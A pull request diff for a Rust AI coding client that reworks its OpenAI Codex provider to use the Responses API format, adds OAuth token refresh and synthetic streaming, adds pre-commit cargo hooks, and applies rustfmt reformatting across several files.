### PR TITLE
fix: restore OpenAI Codex subscription flow

### DIFF
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,0 +1,21 @@
+repos:
+  - repo: local
+    hooks:
+      - id: cargo-fmt-check
+        name: cargo fmt --check
+        language: system
+        stages: [pre-commit]
+        pass_filenames: false
+        entry: bash -lc 'cd src-rust && cargo fmt --check'
+      - id: cargo-check
+        name: cargo check --locked
+        language: system
+        stages: [pre-commit]
+        pass_filenames: false
+        entry: bash -lc 'cd src-rust && cargo check --locked'
+      - id: cargo-test
+        name: cargo test --locked
+        language: system
+        stages: [pre-push]
+        pass_filenames: false
+        entry: bash -lc 'cd src-rust && cargo test --locked'

--- a/src-rust/crates/acp/src/lib.rs
+++ b/src-rust/crates/acp/src/lib.rs
@@ -125,10 +125,7 @@ pub async fn run_acp_server() -> anyhow::Result<()> {
     Ok(())
 }
 
-async fn write_line(
-    stdout: &mut tokio::io::Stdout,
-    value: &impl Serialize,
-) -> anyhow::Result<()> {
+async fn write_line(stdout: &mut tokio::io::Stdout, value: &impl Serialize) -> anyhow::Result<()> {
     let mut line = serde_json::to_string(value)?;
     line.push('\n');
     stdout.write_all(line.as_bytes()).await?;
@@ -182,10 +179,7 @@ async fn handle_request(req: JsonRpcRequest) -> JsonRpcResponse {
 
         // ------------------------------------------------------------------
         "session/create" => {
-            let session_id = format!(
-                "acp-{}",
-                chrono::Utc::now().timestamp_millis()
-            );
+            let session_id = format!("acp-{}", chrono::Utc::now().timestamp_millis());
             JsonRpcResponse::success(
                 id,
                 serde_json::json!({
@@ -238,11 +232,7 @@ async fn handle_request(req: JsonRpcRequest) -> JsonRpcResponse {
         }
 
         // ------------------------------------------------------------------
-        other => JsonRpcResponse::error(
-            id,
-            -32601,
-            format!("Method not found: {}", other),
-        ),
+        other => JsonRpcResponse::error(id, -32601, format!("Method not found: {}", other)),
     }
 }
 

--- a/src-rust/crates/api/src/cch.rs
+++ b/src-rust/crates/api/src/cch.rs
@@ -8,7 +8,7 @@
 use xxhash_rust::xxh64::xxh64;
 
 const CCH_SEED: u64 = 0x6E52_736A_C806_831E;
-const CCH_MASK: u64 = 0xF_FFFF;   // 5 hex digits
+const CCH_MASK: u64 = 0xF_FFFF; // 5 hex digits
 const CCH_PLACEHOLDER: &str = "cch=00000";
 
 /// Compute the 5-hex-digit CCH hash for `body`.

--- a/src-rust/crates/api/src/codex_adapter.rs
+++ b/src-rust/crates/api/src/codex_adapter.rs
@@ -4,9 +4,9 @@
 //! CreateMessageRequest format to OpenAI's ChatCompletion API format, and responses
 //! are translated back to Anthropic's CreateMessageResponse format.
 
-use serde_json::{json, Value};
 use super::types::{CreateMessageRequest, CreateMessageResponse, SystemPrompt};
 use claurst_core::types::UsageInfo;
+use serde_json::{json, Value};
 
 /// OpenAI Codex API endpoint for responses
 pub const CODEX_RESPONSES_ENDPOINT: &str = "https://chatgpt.com/backend-api/codex/responses";
@@ -31,13 +31,11 @@ pub fn anthropic_to_openai_request(request: &CreateMessageRequest) -> Value {
     if let Some(system) = &request.system {
         let system_text = match system {
             SystemPrompt::Text(text) => text.clone(),
-            SystemPrompt::Blocks(blocks) => {
-                blocks
-                    .iter()
-                    .map(|b| b.text.clone())
-                    .collect::<Vec<_>>()
-                    .join("\n")
-            }
+            SystemPrompt::Blocks(blocks) => blocks
+                .iter()
+                .map(|b| b.text.clone())
+                .collect::<Vec<_>>()
+                .join("\n"),
         };
 
         openai_messages.push(json!({
@@ -182,7 +180,8 @@ mod tests {
         // Verify structure
         assert_eq!(openai_req["model"], "gpt-5.2-codex");
         assert_eq!(openai_req["max_tokens"], 1024);
-        assert_eq!(openai_req["temperature"], 0.7);
+        let temp = openai_req["temperature"].as_f64().unwrap();
+        assert!((temp - 0.7).abs() < 1e-6);
         assert!(openai_req["messages"].is_array());
 
         let messages = openai_req["messages"].as_array().unwrap();
@@ -218,13 +217,8 @@ mod tests {
 
     #[test]
     fn test_build_anthropic_response() {
-        let response = build_anthropic_response(
-            "Test response",
-            "end_turn",
-            100,
-            50,
-            "gpt-5.2-codex",
-        );
+        let response =
+            build_anthropic_response("Test response", "end_turn", 100, 50, "gpt-5.2-codex");
 
         assert_eq!(response.response_type, "message");
         assert_eq!(response.role, "assistant");

--- a/src-rust/crates/api/src/codex_adapter.rs
+++ b/src-rust/crates/api/src/codex_adapter.rs
@@ -1,8 +1,9 @@
-//! Codex schema adapter — translates between Anthropic Messages API and OpenAI API formats.
+//! Codex schema adapter — translates between Anthropic Messages API and OpenAI Responses formats.
 //!
 //! When using OpenAI Codex provider, requests are translated from Anthropic's
-//! CreateMessageRequest format to OpenAI's ChatCompletion API format, and responses
-//! are translated back to Anthropic's CreateMessageResponse format.
+//! CreateMessageRequest format to the OpenAI Responses API shape used by the
+//! ChatGPT Codex backend, and responses are translated back to Anthropic's
+//! CreateMessageResponse format.
 
 use super::types::{CreateMessageRequest, CreateMessageResponse, SystemPrompt};
 use claurst_core::types::UsageInfo;
@@ -11,51 +12,71 @@ use serde_json::{json, Value};
 /// OpenAI Codex API endpoint for responses
 pub const CODEX_RESPONSES_ENDPOINT: &str = "https://chatgpt.com/backend-api/codex/responses";
 
-/// Convert an Anthropic CreateMessageRequest to OpenAI ChatCompletion request format.
+fn system_text(system: &Option<SystemPrompt>) -> String {
+    match system {
+        Some(SystemPrompt::Text(text)) => text.clone(),
+        Some(SystemPrompt::Blocks(blocks)) => blocks
+            .iter()
+            .map(|b| b.text.clone())
+            .collect::<Vec<_>>()
+            .join("\n"),
+        None => String::new(),
+    }
+}
+
+fn content_text(content: &Value) -> String {
+    match content {
+        Value::String(text) => text.clone(),
+        Value::Array(items) => items
+            .iter()
+            .filter_map(|item| {
+                item.get("text")
+                    .and_then(|text| text.as_str())
+                    .map(|text| text.to_string())
+            })
+            .collect::<Vec<_>>()
+            .join("\n"),
+        _ => content.as_str().unwrap_or("").to_string(),
+    }
+}
+
+/// Convert an Anthropic CreateMessageRequest to OpenAI Responses request format.
 pub fn anthropic_to_openai_request(request: &CreateMessageRequest) -> Value {
-    // Convert Anthropic messages to OpenAI format
-    let messages: Vec<Value> = request
+    let input: Vec<Value> = request
         .messages
         .iter()
         .map(|msg| {
-            json!({
-                "role": msg.role.to_lowercase(),
-                "content": msg.content,
-            })
+            let role = msg.role.to_lowercase();
+            let text = content_text(&msg.content);
+
+            if role == "assistant" {
+                json!({
+                    "role": "assistant",
+                    "content": [{
+                        "type": "output_text",
+                        "text": text,
+                    }],
+                })
+            } else {
+                json!({
+                    "role": role,
+                    "content": [{
+                        "type": "input_text",
+                        "text": text,
+                    }],
+                })
+            }
         })
         .collect();
 
-    // Build system message from prompt if present
-    let mut openai_messages = vec![];
-
-    if let Some(system) = &request.system {
-        let system_text = match system {
-            SystemPrompt::Text(text) => text.clone(),
-            SystemPrompt::Blocks(blocks) => blocks
-                .iter()
-                .map(|b| b.text.clone())
-                .collect::<Vec<_>>()
-                .join("\n"),
-        };
-
-        openai_messages.push(json!({
-            "role": "system",
-            "content": system_text,
-        }));
-    }
-
-    // Add regular messages
-    openai_messages.extend(messages);
-
-    // Build OpenAI request
     let mut openai_req = json!({
         "model": request.model,
-        "messages": openai_messages,
-        "max_tokens": request.max_tokens,
-        "stream": request.stream,
+        "instructions": system_text(&request.system),
+        "input": input,
+        "store": false,
+        "stream": true,
     });
 
-    // Add optional parameters
     if let Some(temperature) = request.temperature {
         openai_req["temperature"] = json!(temperature);
     }
@@ -63,29 +84,67 @@ pub fn anthropic_to_openai_request(request: &CreateMessageRequest) -> Value {
         openai_req["top_p"] = json!(top_p);
     }
 
-    // Note: OpenAI Codex doesn't support thinking blocks or tools in the same way
-    // Skip those fields for now — they would need special handling
-
     openai_req
 }
 
-/// Convert an OpenAI ChatCompletion response to Anthropic format fields.
+fn extract_output_text(response: &Value) -> Option<String> {
+    if let Some(text) = response.get("output_text").and_then(|text| text.as_str()) {
+        return Some(text.to_string());
+    }
+
+    response
+        .get("output")
+        .and_then(|output| output.as_array())
+        .map(|items| {
+            items
+                .iter()
+                .flat_map(|item| {
+                    if item.get("type").and_then(|v| v.as_str()) == Some("message") {
+                        item.get("content")
+                            .and_then(|content| content.as_array())
+                            .into_iter()
+                            .flatten()
+                            .filter_map(|part| {
+                                part.get("text")
+                                    .and_then(|text| text.as_str())
+                                    .map(|text| text.to_string())
+                            })
+                            .collect::<Vec<_>>()
+                    } else {
+                        Vec::new()
+                    }
+                })
+                .collect::<Vec<_>>()
+                .join("")
+        })
+        .filter(|text| !text.is_empty())
+}
+
+/// Convert an OpenAI response to Anthropic format fields.
 /// Returns (content_text, finish_reason, input_tokens, output_tokens)
 pub fn parse_openai_response(response: &Value) -> (String, String, u64, u64) {
-    let content = response
-        .get("choices")
-        .and_then(|c| c.get(0))
-        .and_then(|c| c.get("message"))
-        .and_then(|m| m.get("content"))
-        .and_then(|c| c.as_str())
-        .unwrap_or("")
-        .to_string();
+    let content = extract_output_text(response).unwrap_or_else(|| {
+        response
+            .get("choices")
+            .and_then(|c| c.get(0))
+            .and_then(|c| c.get("message"))
+            .and_then(|m| m.get("content"))
+            .and_then(|c| c.as_str())
+            .unwrap_or("")
+            .to_string()
+    });
 
     let finish_reason = response
-        .get("choices")
-        .and_then(|c| c.get(0))
-        .and_then(|c| c.get("finish_reason"))
-        .and_then(|f| f.as_str())
+        .get("incomplete_details")
+        .and_then(|details| details.get("reason"))
+        .and_then(|reason| reason.as_str())
+        .or_else(|| {
+            response
+                .get("choices")
+                .and_then(|c| c.get(0))
+                .and_then(|c| c.get("finish_reason"))
+                .and_then(|f| f.as_str())
+        })
         .unwrap_or("stop");
 
     // Map OpenAI finish_reason to Anthropic stop_reason
@@ -101,13 +160,16 @@ pub fn parse_openai_response(response: &Value) -> (String, String, u64, u64) {
     // Extract usage info
     let input_tokens = response
         .get("usage")
-        .and_then(|u| u.get("prompt_tokens"))
+        .and_then(|u| u.get("input_tokens").or_else(|| u.get("prompt_tokens")))
         .and_then(|t| t.as_u64())
         .unwrap_or(0);
 
     let output_tokens = response
         .get("usage")
-        .and_then(|u| u.get("completion_tokens"))
+        .and_then(|u| {
+            u.get("output_tokens")
+                .or_else(|| u.get("completion_tokens"))
+        })
         .and_then(|t| t.as_u64())
         .unwrap_or(0);
 
@@ -179,29 +241,35 @@ mod tests {
 
         // Verify structure
         assert_eq!(openai_req["model"], "gpt-5.2-codex");
-        assert_eq!(openai_req["max_tokens"], 1024);
+        assert_eq!(openai_req["instructions"], "You are helpful");
+        assert!(openai_req.get("max_completion_tokens").is_none());
+        assert!(openai_req.get("max_output_tokens").is_none());
+        assert!(openai_req.get("max_tokens").is_none());
+        assert_eq!(openai_req["store"], false);
+        assert_eq!(openai_req["stream"], true);
         let temp = openai_req["temperature"].as_f64().unwrap();
         assert!((temp - 0.7).abs() < 1e-6);
-        assert!(openai_req["messages"].is_array());
+        assert!(openai_req["input"].is_array());
 
-        let messages = openai_req["messages"].as_array().unwrap();
-        assert_eq!(messages.len(), 2); // system + user
-        assert_eq!(messages[0]["role"], "system");
-        assert_eq!(messages[1]["role"], "user");
+        let input = openai_req["input"].as_array().unwrap();
+        assert_eq!(input.len(), 1);
+        assert_eq!(input[0]["role"], "user");
+        assert_eq!(input[0]["content"][0]["type"], "input_text");
     }
 
     #[test]
     fn test_parse_openai_response_basic() {
         let openai_resp = json!({
-            "choices": [{
-                "message": {
-                    "content": "Hello, world!"
-                },
-                "finish_reason": "stop"
+            "output": [{
+                "type": "message",
+                "content": [{
+                    "type": "output_text",
+                    "text": "Hello, world!"
+                }]
             }],
             "usage": {
-                "prompt_tokens": 10,
-                "completion_tokens": 5,
+                "input_tokens": 10,
+                "output_tokens": 5,
                 "total_tokens": 15
             }
         });

--- a/src-rust/crates/api/src/error_handling.rs
+++ b/src-rust/crates/api/src/error_handling.rs
@@ -262,8 +262,7 @@ impl RetryConfig {
     /// Applies exponential back-off with ±10 % jitter derived from the
     /// current system time (no external `rand` dependency required).
     pub fn delay_for_attempt(&self, attempt: u32) -> Duration {
-        let base = self.initial_delay.as_secs_f64()
-            * self.backoff_multiplier.powi(attempt as i32);
+        let base = self.initial_delay.as_secs_f64() * self.backoff_multiplier.powi(attempt as i32);
         let jitter = base * 0.1 * time_jitter_f64();
         Duration::from_secs_f64((base + jitter).min(self.max_delay.as_secs_f64()))
     }

--- a/src-rust/crates/api/src/lib.rs
+++ b/src-rust/crates/api/src/lib.rs
@@ -27,12 +27,12 @@ pub mod cch;
 pub mod codex_adapter;
 
 // Provider-agnostic unified types (Phase 1A).
-pub mod provider_types;
 pub mod provider_error;
+pub mod provider_types;
 
 // Provider abstraction traits (Phase 1B).
-pub mod provider;
 pub mod auth;
+pub mod provider;
 pub mod stream_parser;
 pub mod transform;
 
@@ -59,13 +59,13 @@ pub use streaming::{AnthropicStreamEvent, StreamHandler};
 pub use types::*;
 
 // Phase 1A re-exports — provider-agnostic layer.
-pub use provider_types::*;
 pub use provider_error::ProviderError;
+pub use provider_types::*;
 
 // Phase 1B re-exports — provider abstraction traits.
-pub use provider::{LlmProvider, ModelInfo};
 pub use auth::{AuthProvider, LoginFlow};
-pub use stream_parser::{StreamParser, SseStreamParser, JsonLinesStreamParser};
+pub use provider::{LlmProvider, ModelInfo};
+pub use stream_parser::{JsonLinesStreamParser, SseStreamParser, StreamParser};
 pub use transform::MessageTransformer;
 
 // Phase 1C re-exports — provider registry.
@@ -77,7 +77,7 @@ pub use providers::GoogleProvider;
 pub use providers::OpenAiProvider;
 
 // Phase 3 re-exports — model registry.
-pub use model_registry::{ModelEntry, ModelRegistry, effective_model_for_config};
+pub use model_registry::{effective_model_for_config, ModelEntry, ModelRegistry};
 
 // Phase 6 re-exports — provider-aware error handling.
 pub use error_handling::{is_context_overflow, parse_error_response, RetryConfig};
@@ -89,8 +89,7 @@ pub use providers::CopilotProvider;
 
 // Phase 2B re-exports — OpenAI-compatible generic adapter + common factories.
 pub use providers::{
-    OpenAiCompatProvider,
-    ollama, lm_studio, deepseek, groq, xai, openrouter, mistral,
+    deepseek, groq, lm_studio, mistral, ollama, openrouter, xai, OpenAiCompatProvider,
 };
 
 // Phase 2D re-exports — Cohere native provider.
@@ -273,14 +272,9 @@ pub mod streaming {
             content_block: ContentBlock,
         },
         /// Incremental delta for an existing content block.
-        ContentBlockDelta {
-            index: usize,
-            delta: ContentDelta,
-        },
+        ContentBlockDelta { index: usize, delta: ContentDelta },
         /// A content block is finished.
-        ContentBlockStop {
-            index: usize,
-        },
+        ContentBlockStop { index: usize },
         /// Final message-level delta (stop_reason, usage).
         MessageDelta {
             stop_reason: Option<String>,
@@ -289,14 +283,10 @@ pub mod streaming {
         /// The message is complete.
         MessageStop,
         /// An error occurred during streaming.
-        Error {
-            error_type: String,
-            message: String,
-        },
+        Error { error_type: String, message: String },
         /// A ping/keep-alive event.
         Ping,
     }
-
 
     /// The delta payload inside a `content_block_delta` event.
     #[derive(Debug, Clone, Serialize, Deserialize)]
@@ -452,6 +442,96 @@ pub mod client {
     }
 
     impl AnthropicClient {
+        async fn resolve_codex_auth(&self) -> Result<(String, Option<String>), ClaudeError> {
+            let mut tokens = claurst_core::oauth_config::get_codex_tokens();
+
+            if let Some(current) = tokens.as_mut() {
+                let now = std::time::SystemTime::now()
+                    .duration_since(std::time::UNIX_EPOCH)
+                    .unwrap_or_default()
+                    .as_secs();
+                let expired = current
+                    .expires_at
+                    .map(|expires_at| now >= expires_at.saturating_sub(60))
+                    .unwrap_or(false);
+
+                if expired {
+                    let refresh = current.refresh_token.clone().ok_or_else(|| {
+                        ClaudeError::Auth(
+                            "OpenAI Codex login expired. Run /connect and choose OpenAI Codex again."
+                                .to_string(),
+                        )
+                    })?;
+
+                    let body: Value = reqwest::Client::new()
+                        .post(claurst_core::codex_oauth::CODEX_TOKEN_URL)
+                        .form(&[
+                            ("grant_type", "refresh_token"),
+                            ("refresh_token", refresh.as_str()),
+                            ("client_id", claurst_core::codex_oauth::CODEX_CLIENT_ID),
+                        ])
+                        .send()
+                        .await
+                        .map_err(|e| {
+                            ClaudeError::Other(format!("Codex token refresh failed: {}", e))
+                        })?
+                        .error_for_status()
+                        .map_err(|e| {
+                            ClaudeError::Auth(format!("Codex token refresh failed: {}", e))
+                        })?
+                        .json()
+                        .await
+                        .map_err(|e| {
+                            ClaudeError::Other(format!(
+                                "Failed to parse Codex token refresh response: {}",
+                                e
+                            ))
+                        })?;
+
+                    current.access_token = body["access_token"].as_str().unwrap_or("").to_string();
+                    if current.access_token.is_empty() {
+                        return Err(ClaudeError::Auth(
+                            "Codex token refresh returned no access token.".to_string(),
+                        ));
+                    }
+                    if let Some(refresh_token) = body["refresh_token"].as_str() {
+                        current.refresh_token = Some(refresh_token.to_string());
+                    }
+                    current.expires_at =
+                        claurst_core::codex_oauth::expires_at_from_now(body["expires_in"].as_u64());
+                    current.account_id = body["id_token"]
+                        .as_str()
+                        .and_then(claurst_core::codex_oauth::extract_account_id_from_jwt)
+                        .or_else(|| {
+                            claurst_core::codex_oauth::extract_account_id_from_jwt(
+                                &current.access_token,
+                            )
+                        })
+                        .or_else(|| current.account_id.clone());
+                    claurst_core::oauth_config::save_codex_tokens(current).map_err(|e| {
+                        ClaudeError::Other(format!("Failed to save refreshed Codex token: {}", e))
+                    })?;
+                }
+            }
+
+            let access_token = tokens
+                .as_ref()
+                .map(|tokens| tokens.access_token.as_str())
+                .filter(|token| !token.is_empty())
+                .or_else(|| {
+                    (!self.config.api_key.is_empty()).then_some(self.config.api_key.as_str())
+                })
+                .ok_or_else(|| {
+                    ClaudeError::Auth(
+                        "No OpenAI Codex login found. Run /connect and choose OpenAI Codex."
+                            .to_string(),
+                    )
+                })?
+                .to_string();
+
+            Ok((access_token, tokens.and_then(|tokens| tokens.account_id)))
+        }
+
         /// Returns `true` when the client was constructed without an API key.
         ///
         /// The query loop checks this to know whether it should fall back to
@@ -504,7 +584,11 @@ pub mod client {
                         "Model '{}' is a Google model. Use `--provider google` or set GOOGLE_API_KEY.",
                         model
                     )
-                } else if model.starts_with("gpt-") || model.starts_with("o1") || model.starts_with("o3") || model.starts_with("o4") {
+                } else if model.starts_with("gpt-")
+                    || model.starts_with("o1")
+                    || model.starts_with("o3")
+                    || model.starts_with("o4")
+                {
                     format!(
                         "Model '{}' is an OpenAI model. Use `--provider openai` or set OPENAI_API_KEY.",
                         model
@@ -536,11 +620,13 @@ pub mod client {
                     )
                 } else {
                     "Set ANTHROPIC_API_KEY, run `claurst auth login`, \
-                     or use --provider to select a different provider (e.g. --provider openai).".to_string()
+                     or use --provider to select a different provider (e.g. --provider openai)."
+                        .to_string()
                 };
-                return Err(ClaudeError::Auth(
-                    format!("No API key for the selected model. {}", hint)
-                ));
+                return Err(ClaudeError::Auth(format!(
+                    "No API key for the selected model. {}",
+                    hint
+                )));
             }
             // Route to Codex if configured
             if self.config.provider == Provider::Codex {
@@ -566,16 +652,31 @@ pub mod client {
             &self,
             request: &CreateMessageRequest,
         ) -> Result<CreateMessageResponse, ClaudeError> {
+            let (access_token, account_id) = self.resolve_codex_auth().await?;
+            let model = request
+                .model
+                .strip_prefix("openai-codex/")
+                .unwrap_or(&request.model)
+                .to_string();
+
             // Convert Anthropic format to OpenAI format
-            let openai_req = codex_adapter::anthropic_to_openai_request(request);
+            let mut openai_req = codex_adapter::anthropic_to_openai_request(request);
+            openai_req["model"] = Value::String(model.clone());
 
             // Send to Codex endpoint
             let client = reqwest::Client::new();
-            let resp = client
+            let mut req = client
                 .post(codex_adapter::CODEX_RESPONSES_ENDPOINT)
-                .header("Authorization", format!("Bearer {}", self.config.api_key))
+                .header("Authorization", format!("Bearer {}", access_token))
                 .header("Content-Type", "application/json")
-                .json(&openai_req)
+                .json(&openai_req);
+            if let Some(account_id) = account_id
+                .as_deref()
+                .filter(|account_id| !account_id.is_empty())
+            {
+                req = req.header("ChatGPT-Account-Id", account_id);
+            }
+            let resp = req
                 .timeout(self.config.request_timeout)
                 .send()
                 .await
@@ -598,7 +699,7 @@ pub mod client {
                 &stop_reason,
                 input_tokens,
                 output_tokens,
-                &request.model,
+                &model,
             );
 
             Ok(response)
@@ -622,7 +723,11 @@ pub mod client {
                         "Model '{}' is a Google model. Use `--provider google` or set GOOGLE_API_KEY.",
                         model
                     )
-                } else if model.starts_with("gpt-") || model.starts_with("o1") || model.starts_with("o3") || model.starts_with("o4") {
+                } else if model.starts_with("gpt-")
+                    || model.starts_with("o1")
+                    || model.starts_with("o3")
+                    || model.starts_with("o4")
+                {
                     format!(
                         "Model '{}' is an OpenAI model. Use `--provider openai` or set OPENAI_API_KEY.",
                         model
@@ -630,7 +735,10 @@ pub mod client {
                 } else if model.starts_with("deepseek") {
                     format!("Model '{}' is a DeepSeek model. Use `--provider deepseek` or set DEEPSEEK_API_KEY.", model)
                 } else if model.starts_with("grok") {
-                    format!("Model '{}' is an xAI model. Use `--provider xai` or set XAI_API_KEY.", model)
+                    format!(
+                        "Model '{}' is an xAI model. Use `--provider xai` or set XAI_API_KEY.",
+                        model
+                    )
                 } else if model.starts_with("mistral") || model.starts_with("codestral") {
                     format!("Model '{}' is a Mistral model. Use `--provider mistral` or set MISTRAL_API_KEY.", model)
                 } else if model.starts_with("command-") {
@@ -639,17 +747,62 @@ pub mod client {
                     format!("Model '{}' looks like a Llama model. Use `--provider groq` or `--provider ollama` for local.", model)
                 } else {
                     "Set ANTHROPIC_API_KEY, run `claurst auth login`, \
-                     or use --provider to select a different provider (e.g. --provider openai).".to_string()
+                     or use --provider to select a different provider (e.g. --provider openai)."
+                        .to_string()
                 };
-                return Err(ClaudeError::Auth(
-                    format!("No API key for the selected model. {}", hint)
-                ));
+                return Err(ClaudeError::Auth(format!(
+                    "No API key for the selected model. {}",
+                    hint
+                )));
             }
-            // Codex provider doesn't support streaming yet
+            // Codex uses a non-streaming endpoint. Synthesize a streaming event
+            // sequence so the rest of the app can keep using the streaming path.
             if self.config.provider == Provider::Codex {
-                return Err(ClaudeError::Other(
-                    "Codex provider does not support streaming yet".to_string(),
-                ));
+                request.stream = false;
+                let response = self.create_message_codex(&request).await?;
+                let stop_reason = response.stop_reason.clone();
+                let usage = response.usage.clone();
+                let text = response
+                    .content
+                    .iter()
+                    .filter_map(|block| block.get("text").and_then(|text| text.as_str()))
+                    .collect::<Vec<_>>()
+                    .join("");
+                let events = vec![
+                    streaming::AnthropicStreamEvent::MessageStart {
+                        id: response.id.clone(),
+                        model: response.model.clone(),
+                        usage: usage.clone(),
+                    },
+                    streaming::AnthropicStreamEvent::ContentBlockStart {
+                        index: 0,
+                        content_block: ContentBlock::Text {
+                            text: String::new(),
+                        },
+                    },
+                    streaming::AnthropicStreamEvent::ContentBlockDelta {
+                        index: 0,
+                        delta: streaming::ContentDelta::TextDelta { text },
+                    },
+                    streaming::AnthropicStreamEvent::ContentBlockStop { index: 0 },
+                    streaming::AnthropicStreamEvent::MessageDelta {
+                        stop_reason,
+                        usage: Some(usage),
+                    },
+                    streaming::AnthropicStreamEvent::MessageStop,
+                ];
+                let (tx, rx) = mpsc::channel(16);
+
+                tokio::spawn(async move {
+                    for event in events {
+                        handler.on_event(&event);
+                        if tx.send(event).await.is_err() {
+                            break;
+                        }
+                    }
+                });
+
+                return Ok(rx);
             }
 
             request.stream = true;
@@ -720,10 +873,7 @@ pub mod client {
         // ---- Internal helpers --------------------------------------------
 
         /// Build the common request and execute with retry logic.
-        async fn send_with_retry(
-            &self,
-            body: &Value,
-        ) -> Result<reqwest::Response, ClaudeError> {
+        async fn send_with_retry(&self, body: &Value) -> Result<reqwest::Response, ClaudeError> {
             let url = format!("{}/v1/messages", self.config.api_base);
             let mut attempts = 0u32;
             let mut delay = self.config.initial_retry_delay;
@@ -738,7 +888,10 @@ pub mod client {
 
                 // Compute CCH hash and build billing header
                 let cch_hash = cch::compute_cch(body_bytes);
-                let billing_header = format!("cc_version=0.1; cc_entrypoint=claude_code; {}; cc_workload=claude_code;", cch_hash);
+                let billing_header = format!(
+                    "cc_version=0.1; cc_entrypoint=claude_code; {}; cc_workload=claude_code;",
+                    cch_hash
+                );
 
                 // Use Bearer auth for Claude.ai OAuth tokens; x-api-key for regular keys.
                 let mut req = self
@@ -850,9 +1003,7 @@ pub mod client {
                 for line in lines {
                     let line = line.trim_end_matches('\r');
                     if let Some(frame) = parser.feed_line(line) {
-                        if let Some(event) =
-                            Self::frame_to_event(&frame.event, &frame.data)
-                        {
+                        if let Some(event) = Self::frame_to_event(&frame.event, &frame.data) {
                             handler.on_event(&event);
                             if tx.send(event).await.is_err() {
                                 // Receiver dropped – stop reading.
@@ -1124,7 +1275,10 @@ impl StreamAccumulator {
                         name: name.clone(),
                         json_buf: String::new(),
                     },
-                    ContentBlock::Thinking { thinking, signature } => PartialBlock::Thinking {
+                    ContentBlock::Thinking {
+                        thinking,
+                        signature,
+                    } => PartialBlock::Thinking {
                         thinking_buf: thinking.clone(),
                         signature_buf: signature.clone(),
                     },

--- a/src-rust/crates/api/src/lib.rs
+++ b/src-rust/crates/api/src/lib.rs
@@ -442,6 +442,12 @@ pub mod client {
     }
 
     impl AnthropicClient {
+        pub fn with_provider(&self, provider: Provider) -> anyhow::Result<Self> {
+            let mut config = self.config.clone();
+            config.provider = provider;
+            Self::new(config)
+        }
+
         async fn resolve_codex_auth(&self) -> Result<(String, Option<String>), ClaudeError> {
             let mut tokens = claurst_core::oauth_config::get_codex_tokens();
 
@@ -668,6 +674,7 @@ pub mod client {
             let mut req = client
                 .post(codex_adapter::CODEX_RESPONSES_ENDPOINT)
                 .header("Authorization", format!("Bearer {}", access_token))
+                .header("Accept", "text/event-stream")
                 .header("Content-Type", "application/json")
                 .json(&openai_req);
             if let Some(account_id) = account_id
@@ -689,6 +696,10 @@ pub mod client {
                 return Err(self.parse_api_error(status.as_u16(), &text));
             }
 
+            if text.contains("response.output_text.delta") || text.contains("response.completed") {
+                return Self::parse_codex_stream_text(&text, &model);
+            }
+
             // Parse OpenAI response and convert to Anthropic format
             let openai_resp: Value = serde_json::from_str(&text).map_err(ClaudeError::Json)?;
             let (content, stop_reason, input_tokens, output_tokens) =
@@ -702,6 +713,94 @@ pub mod client {
                 &model,
             );
 
+            Ok(response)
+        }
+
+        fn parse_codex_stream_text(
+            text: &str,
+            model: &str,
+        ) -> Result<CreateMessageResponse, ClaudeError> {
+            use sse_parser::SseLineParser;
+
+            let mut parser = SseLineParser::new();
+            let mut content = String::new();
+            let mut stop_reason = "end_turn".to_string();
+            let mut usage = UsageInfo::default();
+            let mut response_id: Option<String> = None;
+
+            for raw_line in text.lines() {
+                let line = raw_line.trim_end_matches('\r');
+                if let Some(frame) = parser.feed_line(line) {
+                    if frame.data == "[DONE]" {
+                        continue;
+                    }
+
+                    let value: Value = match serde_json::from_str(&frame.data) {
+                        Ok(value) => value,
+                        Err(_) => continue,
+                    };
+                    let chunk_type = value.get("type").and_then(|v| v.as_str()).unwrap_or("");
+
+                    match chunk_type {
+                        "response.created" => {
+                            response_id = value
+                                .get("response")
+                                .and_then(|response| response.get("id"))
+                                .and_then(|id| id.as_str())
+                                .map(|id| id.to_string());
+                        }
+                        "response.output_text.delta" => {
+                            if let Some(delta) = value.get("delta").and_then(|delta| delta.as_str())
+                            {
+                                content.push_str(delta);
+                            }
+                        }
+                        "response.completed" | "response.incomplete" => {
+                            stop_reason = codex_adapter::parse_openai_response(&value).1;
+                            usage.input_tokens = value
+                                .get("response")
+                                .and_then(|response| response.get("usage"))
+                                .and_then(|usage| usage.get("input_tokens"))
+                                .and_then(|v| v.as_u64())
+                                .unwrap_or(0);
+                            usage.output_tokens = value
+                                .get("response")
+                                .and_then(|response| response.get("usage"))
+                                .and_then(|usage| usage.get("output_tokens"))
+                                .and_then(|v| v.as_u64())
+                                .unwrap_or(0);
+                            usage.cache_read_input_tokens = value
+                                .get("response")
+                                .and_then(|response| response.get("usage"))
+                                .and_then(|usage| usage.get("input_tokens_details"))
+                                .and_then(|details| details.get("cached_tokens"))
+                                .and_then(|v| v.as_u64())
+                                .unwrap_or(0);
+                        }
+                        "error" => {
+                            let message = value
+                                .get("message")
+                                .and_then(|message| message.as_str())
+                                .unwrap_or("Unknown Codex streaming error")
+                                .to_string();
+                            return Err(ClaudeError::Api(message));
+                        }
+                        _ => {}
+                    }
+                }
+            }
+
+            let mut response = codex_adapter::build_anthropic_response(
+                &content,
+                &stop_reason,
+                usage.input_tokens,
+                usage.output_tokens,
+                model,
+            );
+            response.usage.cache_read_input_tokens = usage.cache_read_input_tokens;
+            if let Some(id) = response_id {
+                response.id = id;
+            }
             Ok(response)
         }
 

--- a/src-rust/crates/api/src/model_registry.rs
+++ b/src-rust/crates/api/src/model_registry.rs
@@ -90,9 +90,30 @@ impl ModelRegistry {
     fn add_anthropic_models(&mut self) {
         let pid = ProviderId::new(ProviderId::ANTHROPIC);
         for (id, name, ctx, out, cost_in, cost_out) in [
-            ("claude-opus-4-6",           "Claude Opus 4.6",    200_000u32, 32_000u32, 15.0f64, 75.0f64),
-            ("claude-sonnet-4-6",         "Claude Sonnet 4.6",  200_000,    16_000,     3.0,    15.0),
-            ("claude-haiku-4-5-20251001", "Claude Haiku 4.5",   200_000,     8_096,     0.8,     4.0),
+            (
+                "claude-opus-4-6",
+                "Claude Opus 4.6",
+                200_000u32,
+                32_000u32,
+                15.0f64,
+                75.0f64,
+            ),
+            (
+                "claude-sonnet-4-6",
+                "Claude Sonnet 4.6",
+                200_000,
+                16_000,
+                3.0,
+                15.0,
+            ),
+            (
+                "claude-haiku-4-5-20251001",
+                "Claude Haiku 4.5",
+                200_000,
+                8_096,
+                0.8,
+                4.0,
+            ),
         ] {
             self.insert(ModelEntry {
                 info: ModelInfo {
